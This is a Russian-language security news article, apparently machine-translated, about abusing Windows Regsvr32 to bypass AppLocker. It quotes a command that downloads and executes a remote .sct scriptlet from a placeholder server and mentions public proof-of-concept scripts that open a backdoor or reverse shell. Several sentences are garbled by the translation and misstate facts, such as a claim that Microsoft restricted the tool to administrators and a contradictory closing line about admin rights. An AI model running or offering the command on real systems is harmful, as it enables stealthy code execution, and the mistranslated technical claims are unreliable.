ГлавнаябезопасностьWindows AppLocker Bypass позволяет записывать файлы DLL

Windows AppLocker Bypass позволяет записывать файлы DLL

Умные хакеры могут обойти функцию безопасности Microsoft Windows AppLocker, неправильно используя скрытую функцию утилиты командной строки Regsvr32, которая обычно используется для записи файлов DLL на компьютер Windows.

Это AppLocker - это функция безопасности, представленная в Windows 7 и Windows Server 2008 R2, которая помогает администраторам определять, каким пользователям или группам пользователей разрешен доступ к файлам и их выполнение для каждого файла.

Windows AppLocker Bypass позволяет записывать файлы DLL

Это Regsvr32 один сценариев утилита, которую могут использовать установщики или в пакетных сценариях для быстрой регистрации файла DLL. Как вы понимаете, Microsoft стерилизовала такой опасный инструмент, чтобы предотвратить злоупотребления, разрешив запускать права администратора.

По словам исследователя безопасности Кейси Смитзлоумышленник, имеющий доступ к зараженной рабочей станции Windows, может использовать Regsvr32, чтобы загрузить скриптлет COM (файл .sct) из Интернета и запустить его, чтобы зарегистрировать файл DLL на локальном компьютере.

Злоумышленнику не понадобятся права администратора, Regsvr32 прокси осведомлен, может работать с содержимым TLS, после перенаправления и, прежде всего, подписан сертификатом, выданным Microsoft, заставляя все команды выглядеть как обычная работа Windows, работающая в фоновом режиме.

Ниже приведен типичный синтаксис Regsvr32 и версия вредоносной команды:

regsvr32 [/ u] [/ s] [/ n] [/ i [: cmdline]] dllname regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

«Не очень хорошо задокументировано, что Regsvr32.exe может принимать URL-адрес для скрипт", - также отметил Смит. «Чтобы включить этот обход, поместите фрагмент кода, VB или JS, внутрь элемента».

Для дополнительных тестов исследователь опубликовал четыре проверочные сценарии в GitHub, системные администраторы могут загружать через Regsvr32 и открывать бэкдор или обратную оболочку через HTTP.

Теоретически, эти виды эксплойты позволит хакеру получить доступ к библиотекам DLL, а затем запустить вредоносный код на незащищенных компьютерах, даже с правами администратора.

ОСТАВЬТЕ ОТВЕТ

Пожалуйста, введите ваш комментарий!
Пожалуйста, введите ваше имя здесь

spot_img

ЖИВЫЕ НОВОСТИ